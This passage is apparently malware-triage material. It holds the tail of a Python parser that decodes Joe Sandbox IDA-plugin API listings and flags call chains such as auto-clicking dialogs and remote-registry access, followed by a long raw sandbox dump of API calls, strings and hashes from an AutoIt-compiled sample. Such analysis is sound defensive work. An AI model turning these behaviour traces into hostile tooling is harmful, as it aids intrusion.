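# One bullet: "Api.MODULE(arg,...), ref: ADDR" or "Api.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:" for calls made by a callee.
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

# Only constants whose values are certain are named; anything else stays hex.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x00F5: "BM_CLICK", 0x014B: "CB_RESETCONTENT",
                   0x014E: "CB_SETCURSEL", 0x0158: "CB_FINDSTRINGEXACT"}
HKEYS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
REG_ACCESS = {0x00020019: "KEY_READ", 0x000F003F: "KEY_ALL_ACCESS"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int] = None  # address of the callee that makes this call


def parse_apis(text: str) -> List[Call]:
    """Parse every bullet line that matches the report's call syntax; skip the rest."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def _hex(s: str) -> Optional[int]:
    """An 8-digit hex argument as int; '?' and string arguments give None."""
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", s) else None


def message_id(call: Call) -> Optional[int]:
    """Message id of a SendMessageW call. Assumption: the plugin drops arguments it
    could not resolve, so a 3-argument form starts at the message while the
    4-argument form is (hwnd, msg, wParam, lParam)."""
    if call.api != "SendMessageW" or len(call.args) not in (3, 4):
        return None
    return _hex(call.args[len(call.args) - 3])


def decode(call: Call) -> str:
    """Readable one-liner for the calls whose constants matter for triage."""
    if call.api == "SendMessageW":
        msg = message_id(call)
        name = WINDOW_MESSAGES.get(msg, hex(msg)) if msg is not None else "?"
        return "SendMessageW " + name
    if call.api == "RegConnectRegistryW" and len(call.args) > 1:
        return "RegConnectRegistryW " + HKEYS.get(_hex(call.args[1]), call.args[1])
    if call.api == "RegOpenKeyExW" and len(call.args) > 3:
        return "RegOpenKeyExW " + REG_ACCESS.get(_hex(call.args[3]), call.args[3])
    return call.api


def flag_chains(calls: List[Call]) -> List[str]:
    """Flag call chains in one function body. Subcall lines are excluded because
    they belong to a callee, not to the function being described."""
    own = [c for c in calls if c.subcall_of is None]
    apis = {c.api for c in own}
    msgs = {WINDOW_MESSAGES.get(message_id(c)) for c in own if c.api == "SendMessageW"}
    clicks_button = any(c.api == "FindWindowExW" and "BUTTON" in c.args for c in own)
    flags = []
    if clicks_button and "BM_CLICK" in msgs:
        flags.append("finds a BUTTON control and sends BM_CLICK (auto-dismisses a dialog)")
    if {"WNetAddConnection2W", "RegConnectRegistryW"} <= apis:
        flags.append("maps a remote share, then opens the remote registry")
    return flags


if __name__ == "__main__":
    for sample in (SAMPLE_DIALOG, SAMPLE_REMOTE_REG):
        calls = parse_apis(sample)
        for c in calls:
            print(f"{c.ref:08X} {'(subcall) ' if c.subcall_of else ''}{decode(c)}")
        print("flags:", flag_chains(calls))
```

The same parser can be pointed at any block of "APIs" lines copied from the report; extend the constant tables as new message ids or access masks show up, but leave a value as hex rather than guessing a name.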
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00613C5C
                                                  • CoInitialize.OLE32(00000000), ref: 00613C8A
                                                  • CoUninitialize.OLE32 ref: 00613C94
                                                  • _wcslen.LIBCMT ref: 00613D2D
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00613DB1
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00613ED5
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00613F0E
                                                  • CoGetObject.OLE32(?,00000000,0062FB98,?), ref: 00613F2D
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00613F40
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00613FC4
                                                  • VariantClear.OLEAUT32(?), ref: 00613FD8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                  • String ID:
                                                  • API String ID: 429561992-0
                                                  • Opcode ID: 54a80523df534b8145cfa297ae57e1f6c3e1a4f169f6bd570cc29b3ca1d1cc38
                                                  • Instruction ID: 5d9acf5007d4b5721e38abbc17717a2f0abfb28d1ce03fe36af20e4310ef067b
                                                  • Opcode Fuzzy Hash: 54a80523df534b8145cfa297ae57e1f6c3e1a4f169f6bd570cc29b3ca1d1cc38
                                                  • Instruction Fuzzy Hash: 0DC123716083159FD700DF68C8849AABBEABF89744F04491DF98A9B350DB30ED46CB52
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00607AF3
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00607B8F
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00607BA3
                                                  • CoCreateInstance.OLE32(0062FD08,00000000,00000001,00656E6C,?), ref: 00607BEF
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00607C74
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00607CCC
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00607D57
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00607D7A
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00607D81
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00607DD6
                                                  • CoUninitialize.OLE32 ref: 00607DDC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                  • String ID:
                                                  • API String ID: 2762341140-0
                                                  • Opcode ID: e471e9d721dce432d984ec8936c7d9649e2e4a10d53f94092c20a39c1e32f5fb
                                                  • Instruction ID: d9e4b3a8dc790798173ee3d661add477f85fd82766e0284d65f8df8f3d4cb6e0
                                                  • Opcode Fuzzy Hash: e471e9d721dce432d984ec8936c7d9649e2e4a10d53f94092c20a39c1e32f5fb
                                                  • Instruction Fuzzy Hash: EBC11C75A04509AFDB14DF64C888DAEBBFAFF48314B148499E815DB3A1D730EE45CB90
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00625504
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00625515
                                                  • CharNextW.USER32(00000158), ref: 00625544
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00625585
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0062559B
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006255AC
                                                  Similarity
                                                  • API ID: MessageSend$CharNext
                                                  • String ID:
                                                  • API String ID: 1350042424-0
                                                  • Opcode ID: 776d9bf2acf09e1d153ec17e87212b478647b95e757dcb9554d173d1cd088fe9
                                                  • Instruction ID: 767e8bfaa408f75aa9d4cbfc7d5d506954285e00eedd6ae81945e0bbde7fc91f
                                                  • Opcode Fuzzy Hash: 776d9bf2acf09e1d153ec17e87212b478647b95e757dcb9554d173d1cd088fe9
                                                  • Instruction Fuzzy Hash: 57617E30900A29EBDF309F54EC859FE7BBAEF05760F108145F926AB290D7748A81DF61
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005EFAAF
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 005EFB08
                                                  • VariantInit.OLEAUT32(?), ref: 005EFB1A
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 005EFB3A
                                                  • VariantCopy.OLEAUT32(?,?), ref: 005EFB8D
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 005EFBA1
                                                  • VariantClear.OLEAUT32(?), ref: 005EFBB6
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 005EFBC3
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005EFBCC
                                                  • VariantClear.OLEAUT32(?), ref: 005EFBDE
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005EFBE9
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: d5edd545e0ee8d9124ed38699aaa67aa2e6c8a699a62adf0017f990cc2826676
                                                  • Instruction ID: 19939ba0e0d8bb64f3e80e84d038123c9d2aea0689a1f56a9f6a25838434243f
                                                  • Opcode Fuzzy Hash: d5edd545e0ee8d9124ed38699aaa67aa2e6c8a699a62adf0017f990cc2826676
                                                  • Instruction Fuzzy Hash: E7414035A002199FCF14EF65CC58DAEBFB9FF48354F108069E945AB261DB30A946CFA0
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 005F9CA1
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 005F9D22
                                                  • GetKeyState.USER32(000000A0), ref: 005F9D3D
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 005F9D57
                                                  • GetKeyState.USER32(000000A1), ref: 005F9D6C
                                                  • GetAsyncKeyState.USER32(00000011), ref: 005F9D84
                                                  • GetKeyState.USER32(00000011), ref: 005F9D96
                                                  • GetAsyncKeyState.USER32(00000012), ref: 005F9DAE
                                                  • GetKeyState.USER32(00000012), ref: 005F9DC0
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 005F9DD8
                                                  • GetKeyState.USER32(0000005B), ref: 005F9DEA
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 906cac1131714dce18f06e9295b29959323d269192b932fd4fb501ae1e7a3759
                                                  • Instruction ID: 87ec29ebe42face093b9ac5005effe7cd79b9d5fb28ead4b72aa05ff6d93a655
                                                  • Opcode Fuzzy Hash: 906cac1131714dce18f06e9295b29959323d269192b932fd4fb501ae1e7a3759
                                                  • Instruction Fuzzy Hash: B141A434504FCD6EFF31966488043B5BEA17B12344F18805ADBC6975C2DBA99DC8C7A2
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 006105BC
                                                  • inet_addr.WSOCK32(?), ref: 0061061C
                                                  • gethostbyname.WSOCK32(?), ref: 00610628
                                                  • IcmpCreateFile.IPHLPAPI ref: 00610636
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006106C6
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006106E5
                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 006107B9
                                                  • WSACleanup.WSOCK32 ref: 006107BF
                                                  Strings
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: 6ca875e503cf3ed6070634aaabf0daed9950a25a9a0c78203ad3da2fe6d80f97
                                                  • Instruction ID: ba3392af5ad6bdfec32b18f6cfc839dedacd7fb89ac021f9d35c54c50dc7c93e
                                                  • Opcode Fuzzy Hash: 6ca875e503cf3ed6070634aaabf0daed9950a25a9a0c78203ad3da2fe6d80f97
                                                  • Instruction Fuzzy Hash: 97916E355042019FEB20DF15C589B9ABBE2BF84318F1885A9E4698B7A2C770EDC5CF91
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharLower
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 707087890-567219261
                                                  • Opcode ID: a04e3551582b92150ff9c8450fc8dccc445a483302e3a2976c5e0fdd56b4bc9a
                                                  • Instruction ID: dba00dfe44771a9d4cc2a56e4ac724d89933be89b8828150bb5610006c1428a6
                                                  • Opcode Fuzzy Hash: a04e3551582b92150ff9c8450fc8dccc445a483302e3a2976c5e0fdd56b4bc9a
                                                  • Instruction Fuzzy Hash: 5E517F31A001169ECF24DF68C9508FEB7A6BF65724B284229E826A73C5DB35DD81C790
                                                  APIs
                                                  • CoInitialize.OLE32 ref: 00613774
                                                  • CoUninitialize.OLE32 ref: 0061377F
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,0062FB78,?), ref: 006137D9
                                                  • IIDFromString.OLE32(?,?), ref: 0061384C
                                                  • VariantInit.OLEAUT32(?), ref: 006138E4
                                                  • VariantClear.OLEAUT32(?), ref: 00613936
                                                  Strings
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 636576611-1287834457
                                                  • Opcode ID: feda6d608bffae00eea0783d098c0438c2932d199d8c46a7404cf82a66f89f68
                                                  • Instruction ID: b38d1736d94a8139f54e3f4acf7b9cf2dcdddfc61bd75556687ab519f6c95eb6
                                                  • Opcode Fuzzy Hash: feda6d608bffae00eea0783d098c0438c2932d199d8c46a7404cf82a66f89f68
                                                  • Instruction Fuzzy Hash: 8361C1702087119FD710DF54C848BAABBEAEF89710F04481DF9869B391D770EE89CB96
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006033CF
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006033F0
                                                  Strings
                                                  Similarity
                                                  • API ID: LoadString$_wcslen
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 4099089115-3080491070
                                                  • Opcode ID: 5c1e69dd432a7702313b41315f9ee3e75132c49f0c343e92f1b1a1f4cf410c2b
                                                  • Instruction ID: 20774a4b4c6800f2eedfe022ab1218f7dbff74eceeb8455d8d1779a2a0be3668
                                                  • Opcode Fuzzy Hash: 5c1e69dd432a7702313b41315f9ee3e75132c49f0c343e92f1b1a1f4cf410c2b
                                                  • Instruction Fuzzy Hash: 1451DF3184020AAADF15EBE0CD4AEEEBB7AFF44341F204165F505721A2EB352F58CB60
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 1256254125-769500911
                                                  • Opcode ID: 7801358eb44b2a17a68786624aaa634ae93d09145266ec877a01eeec47518825
                                                  • Instruction ID: b97f1284de9566632b7d68e578f979132996d0d57619c95833c321c6a8f18920
                                                  • Opcode Fuzzy Hash: 7801358eb44b2a17a68786624aaa634ae93d09145266ec877a01eeec47518825
                                                  • Instruction Fuzzy Hash: 4041C732A0102BDADB206F7DCC905BE7FA5BFA4794B244229E621D7284F739CD81C790
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 006053A0
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00605416
                                                  • GetLastError.KERNEL32 ref: 00605420
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 006054A7
                                                  Strings
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 23e92c44d0ae4aebe5822d0932f88dfb79540636f6e3abdb2f1acba8c3dce70e
                                                  • Instruction ID: b1f8e6ebe62f9633ac0c7aba2677eedb3706fd5d9802527b7ec2808b663cf65c
                                                  • Opcode Fuzzy Hash: 23e92c44d0ae4aebe5822d0932f88dfb79540636f6e3abdb2f1acba8c3dce70e
                                                  • Instruction Fuzzy Hash: 5C316935A406059FCB14DF68C489AEBBBF6EB44315F548069E806CB392DA70DD86CB91
                                                  APIs
                                                  • CreateMenu.USER32 ref: 00623C79
                                                  • SetMenu.USER32(?,00000000), ref: 00623C88
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00623D10
                                                  • IsMenu.USER32(?), ref: 00623D24
                                                  • CreatePopupMenu.USER32 ref: 00623D2E
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00623D5B
                                                  • DrawMenuBar.USER32 ref: 00623D63
                                                  Strings
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                  • String ID: 0$F
                                                  • API String ID: 161812096-3044882817
                                                  • Opcode ID: 6c26e76c86b7220315a2c3c7e7e08bcb5465ba1a1278f9adac23861acc36c5e1
                                                  • Instruction ID: 52d7c4b4fbbf414a177ad09834ce5a48c99b3b55454a006cf4646c18bfbfec05
                                                  • Opcode Fuzzy Hash: 6c26e76c86b7220315a2c3c7e7e08bcb5465ba1a1278f9adac23861acc36c5e1
                                                  • Instruction Fuzzy Hash: D9416D75A01A19AFDB24CF64E844AEA7BB6FF49350F140428F946AB360D774EA11CF90
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00623A9D
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00623AA0
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00623AC7
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00623AEA
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00623B62
                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00623BAC
                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00623BC7
                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00623BE2
                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00623BF6
                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00623C13
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow
                                                  • String ID:
                                                  • API String ID: 312131281-0
                                                  • Opcode ID: 21fd85a29714d126aab29f5772512fe87c3bcd4a93f7dbcd242b9730d969ead8
                                                  • Instruction ID: 27e9db9be74c430d057e653bb10c12f5f104abcb6b1b9de19fa9b8e3194d310c
                                                  • Opcode Fuzzy Hash: 21fd85a29714d126aab29f5772512fe87c3bcd4a93f7dbcd242b9730d969ead8
                                                  • Instruction Fuzzy Hash: 96618B75A00628AFDB10DFA8DC81EEE77B9EB09700F144199FA15AB3A1C774AE41DF50
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 005FB151
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB165
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 005FB16C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB17B
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 005FB18D
                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB1A6
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB1B8
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB1FD
                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB212
                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB21D
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: ee9d62d7541ff7da54a295222cfc54a573245ba001cf67a93e1382f98ba257dc
                                                  • Instruction ID: 39c6dadff105d1fd74714877c7e6e038d8415050b75012c81a5e51357f7ea8bf
                                                  • Opcode Fuzzy Hash: ee9d62d7541ff7da54a295222cfc54a573245ba001cf67a93e1382f98ba257dc
                                                  • Instruction Fuzzy Hash: 41316B79500618FFEB209F64DC48FBD7FAAFB61361F105015FA05D6290D7B89A458FA0
                                                  APIs
                                                  • _free.LIBCMT ref: 005C2C94
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005C2CA0
                                                  • _free.LIBCMT ref: 005C2CAB
                                                  • _free.LIBCMT ref: 005C2CB6
                                                  • _free.LIBCMT ref: 005C2CC1
                                                  • _free.LIBCMT ref: 005C2CCC
                                                  • _free.LIBCMT ref: 005C2CD7
                                                  • _free.LIBCMT ref: 005C2CE2
                                                  • _free.LIBCMT ref: 005C2CED
                                                  • _free.LIBCMT ref: 005C2CFB
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d6ee96bb91fc351e5ade815280c0f1cacf1f32a04251b23dc55e199d638f661e
                                                  • Instruction ID: 4bf37b551da5e27e253514703a7af2146ae63af82a2327a4e22bdee3c4ffded8
                                                  • Opcode Fuzzy Hash: d6ee96bb91fc351e5ade815280c0f1cacf1f32a04251b23dc55e199d638f661e
                                                  • Instruction Fuzzy Hash: 6E11A476100109BFCB02EF94D886EDD3FA5FF45350F4144A9FA489F222DA31EE909B90
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00591459
                                                  • OleUninitialize.OLE32(?,00000000), ref: 005914F8
                                                  • UnregisterHotKey.USER32(?), ref: 005916DD
                                                  • DestroyWindow.USER32(?), ref: 005D24B9
                                                  • FreeLibrary.KERNEL32(?), ref: 005D251E
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005D254B
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: 8a6fde31b062fc5eb9a3054ee81bb5fa85202792da8d6f707a208408d8992eb1
                                                  • Instruction ID: c1343b30f7d13e0686e7c869793e6f7579927647edffdd1de9cb4a717ac4576c
                                                  • Opcode Fuzzy Hash: 8a6fde31b062fc5eb9a3054ee81bb5fa85202792da8d6f707a208408d8992eb1
                                                  • Instruction Fuzzy Hash: 71D179306016238FCF29EF18D499A29FBA5BF55310F1442AEE44AAB352CB30ED12CF54
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00595C7A
                                                    • Part of subcall function 00595D0A: GetClientRect.USER32(?,?), ref: 00595D30
                                                    • Part of subcall function 00595D0A: GetWindowRect.USER32(?,?), ref: 00595D71
                                                    • Part of subcall function 00595D0A: ScreenToClient.USER32(?,?), ref: 00595D99
                                                  • GetDC.USER32 ref: 005D46F5
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005D4708
                                                  • SelectObject.GDI32(00000000,00000000), ref: 005D4716
                                                  • SelectObject.GDI32(00000000,00000000), ref: 005D472B
                                                  • ReleaseDC.USER32(?,00000000), ref: 005D4733
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005D47C4
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 3cafa09b524ff85ee6cb83c4eddf28043a924cd81cb2fa1dfac2dbe7f1f71c36
                                                  • Instruction ID: f2ad03646fccc23fbf2d6482e93101377396e3178b513d63c762c6f6d0cb80fd
                                                  • Opcode Fuzzy Hash: 3cafa09b524ff85ee6cb83c4eddf28043a924cd81cb2fa1dfac2dbe7f1f71c36
                                                  • Instruction Fuzzy Hash: 4571CC31400605DFCF328F68C984ABA7FB6FF4A361F18426BE9565A2A6D3318C52DF50
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006035E4
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • LoadStringW.USER32(00662390,?,00000FFF,?), ref: 0060360A
                                                  Similarity
                                                  • API ID: LoadString$_wcslen
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 4099089115-2391861430
                                                  • Opcode ID: 7bfd976517392729e4a81deed20f8a75001d95de7d317fd8c2c15dfe98b0602a
                                                  • Instruction ID: 05ad303d813e93faf6c0e21812a2d95696c1df6a041cfdfdc0d5e40f3d24840d
                                                  • Opcode Fuzzy Hash: 7bfd976517392729e4a81deed20f8a75001d95de7d317fd8c2c15dfe98b0602a
                                                  • Instruction Fuzzy Hash: 9A51907184061ABBCF14EBA0CC46EEEBF7ABF54301F144129F505722A1EB711A99DFA0
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060C272
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060C29A
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060C2CA
                                                  • GetLastError.KERNEL32 ref: 0060C322
                                                  • SetEvent.KERNEL32(?), ref: 0060C336
                                                  • InternetCloseHandle.WININET(00000000), ref: 0060C341
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 3113390036-3916222277
                                                  • Opcode ID: 48c323302adde9d654d9e4dcc5494fcbab2696d58ca3f293f2fb9dcf94c6e899
                                                  • Instruction ID: 3c6e33701cd74974e28414366f7db78fd191359042d13de449db99c7dfd2b1e2
                                                  • Opcode Fuzzy Hash: 48c323302adde9d654d9e4dcc5494fcbab2696d58ca3f293f2fb9dcf94c6e899
                                                  • Instruction Fuzzy Hash: 32317FB1540604AFD7299FA48C88AAF7BFEEF49764F10861EF44692280DB34DD069B61
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005D3AAF,?,?,Bad directive syntax error,0062CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 005F98BC
                                                  • LoadStringW.USER32(00000000,?,005D3AAF,?), ref: 005F98C3
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005F9987
                                                  Similarity
                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                  • API String ID: 858772685-4153970271
                                                  • Opcode ID: 84640d973935019f21ca0b89f0f91363214e8e307ac61ed155cb66ab359a2259
                                                  • Instruction ID: a02d2b4090a14fdc4dc148ce92862d1c559d54bfb97d6e649f986b9e9c9901a8
                                                  • Opcode Fuzzy Hash: 84640d973935019f21ca0b89f0f91363214e8e307ac61ed155cb66ab359a2259
                                                  • Instruction Fuzzy Hash: F321823184021EEBCF11AF90CC0AEFD7B7AFF54301F04446AF515620A1DB759618CB60
                                                  APIs
                                                  • GetParent.USER32 ref: 005F20AB
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 005F20C0
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005F214D
                                                  Similarity
